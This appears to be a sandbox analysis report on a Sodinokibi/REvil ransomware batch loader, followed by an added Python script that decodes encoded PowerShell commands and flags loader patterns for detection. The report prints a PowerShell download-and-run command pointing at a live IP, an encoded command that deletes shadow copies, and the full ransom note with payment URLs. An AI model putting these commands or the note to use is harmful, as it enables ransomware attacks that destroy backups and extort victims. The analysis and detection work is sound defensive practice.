Analysis

  • max time kernel
    39s
  • max time network
    35s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    15-05-2020 19:19

General

  • Target

    c509aa5a7dfc8054aa7b969c9b18e245.bat

  • Size

    221B

  • MD5

    2f633c8f1954a6a34a856ca408955cc0

  • SHA1

    fcad0d04ed8366491a60c78bb0210502e2755f91

  • SHA256

    a1eabb8f6bb968611704695eecb919d4b989b4882ddc982fea9d14b1a2d43486

  • SHA512

    1f5b2b75571fbbd329bf0c89c8d1789424aaddd8b942fdf7579a36fde344b881093022de34570cb3938b038e394ff2c42854cd6f20d493a896105f22b30f009c

Malware Config

Extracted

  • Language
    ps1
  • Source
    URLs
  • URLs
    ps1.dropper
    http://185.103.242.78/pastes/c509aa5a7dfc8054aa7b969c9b18e245

Extracted

  • Path
    C:\p7wl3-readme.txt
  • Family
    sodinokibi
  • Ransom Note

    ---=== Welcome. Again. ===---

    [+] Whats Happen? [+]

    Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension p7wl3.
    By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

    [+] What guarantees? [+]

    Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
    To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
    If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.

    [+] How to get access on website? [+]

    You have two ways:

    1) [Recommended] Using a TOR browser!
       a) Download and install TOR browser from this site: https://torproject.org/
       b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E87379AD627A29CF

    2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
       a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
       b) Open our secondary website: http://decryptor.cc/E87379AD627A29CF

    Warning: secondary website can be blocked, thats why first variant much better and more available.

    When you open our website, put the following data in the input form:
    Key:

    GgEcvXP2S1RAYTVxxZxIgpb+UMk7W2k+qobLzYZEonqfT0703/PQCxUGO3RwWEfS
    ZqeDXHEU3dqVlV9j/ZUyz/DwaHUvglQg8H4yIyrS4u1CO/EbZMp/+qIGpSRdZRG4
    DLQ/mgJJdgj2cy+IcUcncSN/sH1LPpyDhUdI4h8zh5F20LYrSRoTesfJUFD1XJaL
    GLR5ncu2r/bXhphezziu67YtkSu0LrGciCND320GHupwReSmlPiP1YCGdaRp53Yi
    qiTdXtAcZjMH4f88HX5TA+tqY9lYZc1D5DCZ1uheQsb2Tqo3DD+bRhH9aR+TAi7A
    JHOOiQdsfDSuUWcB7zWnNLvuEzv8MVqZyl9IBsV3XHOCgQSyn0b/FhiibDzmwupd
    0JZvAqYzU7stTfty98+19PFDUX8lB9PlYmkUN7phua21Yvys6X6tWNkI1hSxqjhR
    hcYdcfZn3z57AEHmIr50GBi5QFLK+9lSu5IXyNq6l4AmYNmbMs/w+FimM2unmUPj
    CyIPgVF4CMtpP6FOWKsKHOCTxaGTkG8pwolbJNccRVe7TMRs5itx9O4FwHoKlAdk
    gYvpycqBBHXVV33vriikX2h0w48cfoT5iZtP1sExfXAEf2Ft5kkPxIK4cSQ4HYaM
    QMQ9iKwtPv1b5w5wI5JH64Uw3h+XOSMX8tevs5oz+nZsOb6rVCM5nn08oNq7vaZg
    AG0Kvu+wxDM85OT35rCjMlAz0GR7u/hM0zCyBfoiN3wXxige9+6kdwekFbzq96f3
    NgTFWf2W/Q0M0A3K4+Kxf7Q2RccTPqGi0zhYTp+CjCvFbPAk3mxzKHbhmHuY/765
    7yQZVtFa9SHEtVBWMaF+f5JR1Bn8jVLPQ97lNT/GGHele8+A3/6p6CvHKa53nMz0
    2duV31aIrjcPJWZywIbE6ZVJyMu+HOmW+hGd9qpZd5bxoDSbmysmEiO8HJCZxN3n
    FAogxdTLGqkMj8JWigRvaR4fqU4P+nMHyH4HuqB7N8StZQW6o4jCUhRnwWKhIycU
    My8/HzhfwHJoUNCWVGgbOmEGquw3/UX94cRvvgutZeHLZfbaxxS04Og9JbC94ZbQ
    6uZAeQOrSyGNe8jp/BeOiI9GZMelvjpQdzc14ihHc1Tmxm/TmqscSAjNh0OGaLAg
    XXfiEeL4U8D/MwV34Tprn949RGD9EeIv/djo/ce3xIt27wnAx+3f4KCF5MSo678b
    hJug8zDpnJi0RCtprO4GVv+ucC+01qXAgiHYpn8XD2NXaqOb+ZNKKHMdPupc9ImG
    HxJBEpekjTNbHjYxmD75HMLkmYWUjXG2fQAW5dGh

    -----------------------------------------------------------------------------------------

    !!! DANGER !!!
    DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data.
    !!! !!! !!!
    ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
    !!! !!! !!!

  • URLs
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E87379AD627A29CF
    http://decryptor.cc/E87379AD627A29CF

Signatures

  • Drops file in Program Files directory (19 IoCs)
  • Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (77 IoCs)
  • Blacklisted process makes network request (1 IoC)
  • Sodin, Sodinokibi, REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives (3 TTPs)
  • Modifies service (2 TTPs, 4 IoCs)
  • Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  • Suspicious use of WriteProcessMemory (5 IoCs)
  • Suspicious use of AdjustPrivilegeToken (7 IoCs)

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\c509aa5a7dfc8054aa7b969c9b18e245.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1440
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/c509aa5a7dfc8054aa7b969c9b18e245');Invoke-ACEEGDUJNDIFWO;Start-Sleep -s 10000"
      2⤵
      • Drops file in Program Files directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Sets desktop wallpaper using registry
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      PID:304
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1036
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1844
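The process tree above is the whole infection chain: cmd.exe runs the .bat, which launches PowerShell with an IEX/DownloadString cradle that pulls the stage-2 script from the paste URL, and that PowerShell spawns a second one with an -e (EncodedCommand) argument. The report does not decode that argument; it is base64 of UTF-16LE text and decodes to `Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}`, i.e. deletion of every Volume Shadow Copy before encryption, which is why vssvc.exe appears and "Modifies service" fires. The script below is an added example, not part of the sandbox output: it decodes the encoded command, runs a few command-line indicators over the report's process tree (command lines and PIDs copied from above), and links the shadow-copy deleter back to the loader that spawned it. The indicator regexes are my own heuristics, not Triage's signatures, and vssvc.exe's parent (not shown in the report) is recorded as None.

```python
# Added example (not from the sandbox report): decode PowerShell -EncodedCommand
# blobs and flag the behaviours visible in the process tree above.
import base64
import binascii
import re

# (pid, parent pid, command line), copied from the report's Processes section.
# vssvc.exe is started by the Service Control Manager; its parent is not shown
# in the report, so it is recorded as None (assumption).
PROCESSES = [
    (1440, None, r'''cmd /c "C:\Users\Admin\AppData\Local\Temp\c509aa5a7dfc8054aa7b969c9b18e245.bat"'''),
    (304, 1440, r'''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/c509aa5a7dfc8054aa7b969c9b18e245');Invoke-ACEEGDUJNDIFWO;Start-Sleep -s 10000"'''),
    (1036, 304, r'''powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=='''),
    (1844, None, r'''C:\Windows\system32\vssvc.exe'''),
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...), so match the prefix family, then the base64 blob that follows.
ENCODED_ARG = re.compile(r"(?i)(?<!\S)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/]+=*)")

# Heuristic indicators (my own, not Triage signatures) run over the script text.
INDICATORS = {
    "download_cradle": re.compile(
        r"(?i)(?:\bIEX\b|Invoke-Expression).*?(?:DownloadString|DownloadFile|"
        r"Net\.WebClient|Invoke-WebRequest|\bIWR\b)"),
    "shadow_copy_deletion": re.compile(
        r"(?i)Win32_Shadowcopy.*?\.Delete\s*\(|vssadmin(?:\.exe)?\s+delete\s+shadows|"
        r"wmic(?:\.exe)?\s+shadowcopy\s+delete"),
    "long_sleep": re.compile(r"(?i)Start-Sleep\s+-s(?:econds)?\s+\d{4,}"),
}


def decode_encoded_command(blob):
    """Return the script carried by -EncodedCommand (base64 of UTF-16LE text),
    or None when the blob is not valid base64 or not valid UTF-16."""
    try:
        raw = base64.b64decode(blob, validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def effective_script(cmdline):
    """Return (script, was_encoded): the text PowerShell actually executes."""
    m = ENCODED_ARG.search(cmdline)
    if m:
        decoded = decode_encoded_command(m.group(1))
        if decoded is not None:
            return decoded, True
    return cmdline, False


def analyze(cmdline):
    """Decode if needed, then list the indicator names that fire on the script."""
    script, encoded = effective_script(cmdline)
    hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    if encoded:
        hits.append("encoded_command")
    return {"script": script, "indicators": hits}


def find_ransomware_chains(processes):
    """Return (findings, chains). findings maps pid -> analyze() result; each
    chain is (loader_pid, deleter_pid): a process that deletes shadow copies
    whose ancestor ran a download cradle, the pattern in this report."""
    parent = {pid: ppid for pid, ppid, _ in processes}
    findings = {pid: analyze(cmd) for pid, _, cmd in processes}
    chains = []
    for pid, result in findings.items():
        if "shadow_copy_deletion" not in result["indicators"]:
            continue
        ancestor = parent[pid]
        while ancestor in findings:  # stops at None / unknown parents
            if "download_cradle" in findings[ancestor]["indicators"]:
                chains.append((ancestor, pid))
                break
            ancestor = parent[ancestor]
    return findings, chains


if __name__ == "__main__":
    findings, chains = find_ransomware_chains(PROCESSES)
    for pid, result in findings.items():
        print(pid, result["indicators"])
        if "encoded_command" in result["indicators"]:
            print("    decoded:", result["script"])
    print("loader -> shadow-copy deleter:", chains)
```

Running it prints PID 304 as the download cradle (plus the 10000-second Start-Sleep that keeps the host process alive while the downloaded function runs), PID 1036 as an encoded shadow-copy deleter with the decoded Get-WmiObject line, and the chain (304, 1036). The same decode-then-match order matters in real telemetry: matching only the raw command line would never see Win32_Shadowcopy in PID 1036, which is exactly why the operators encoded it.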

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms